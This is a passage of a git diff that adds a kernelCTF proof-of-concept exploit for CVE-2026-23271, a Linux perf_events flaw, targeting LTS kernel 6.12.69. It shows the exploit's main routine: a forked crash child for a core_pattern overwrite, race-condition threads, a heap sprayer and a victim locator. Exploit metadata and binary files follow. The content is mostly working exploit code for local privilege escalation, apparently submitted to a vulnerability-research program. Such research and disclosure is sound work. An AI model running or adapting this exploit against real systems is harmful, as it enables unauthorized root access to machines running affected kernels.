log_dbg("Assign ktext to 0x%lx", (unsigned long)ktext); + + log_info("forking process for core_pattern exp later"); + crash_child_pid = fork(); + if (crash_child_pid == 0) { + bind_to_cpu(1); + log_info("Fork crash child pid is %d", getpid()); + crash(); + } + + setup_msg_queues(); + + + if (pthread_create(&t1, NULL, tp_worker_thread, NULL)) { + perror("pthread_create worker"); + return 1; + } + if (pthread_create(&t2, NULL, tp_control_thread, NULL)) { + perror("pthread_create control"); + return 1; + } + if (pthread_create(&t3, NULL, tp_closer_thread, NULL)) { + perror("pthread_create closer"); + return 1; + } + + if (pthread_create(&t4, NULL, sprayer_thread, NULL)) { + perror("pthread_create sprayer"); + return 1; + } + + if (pthread_create(&t5, NULL, locate_victim_event, NULL)) { + perror("pthread_create locator"); + return 1; + } + + pthread_join(t1, NULL); + pthread_join(t2, NULL); + pthread_join(t3, NULL); + pthread_join(t4, NULL); + pthread_join(t5, NULL); + + + if (!__atomic_load_n(&tp_race_success, __ATOMIC_ACQUIRE)) + return 1; + + return 0; +} + diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/target_db.kxdb b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/target_db.kxdb new file mode 100644 index 000000000..b47d2547a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/target_db.kxdb differ diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/metadata.json b/pocs/linux/kernelctf/CVE-2026-23271_lts/metadata.json new file mode 100644 index 000000000..b744119e7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/metadata.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp452"], + "vulnerability": { + "cve": "CVE-2026-23271", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c9bc1753b3cc41d0e01fbca7f035258b5f4db0ae", + "affected_versions": [ + "2.6.31-rc1 - 7.0-rc2" + ], + "requirements": { + "attack_surface": [], + "capabilities": [], + "kernel_config": [ + "CONFIG_PERF_EVENTS" + ] + } + }, + "exploits": { + "lts-6.12.69": { + "environment": "lts-6.12.69", + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "20% success rate" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23271_lts/original.tar.gz new file mode 100644 index 000000000..539eec38b Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23271_lts/original.tar.gz differ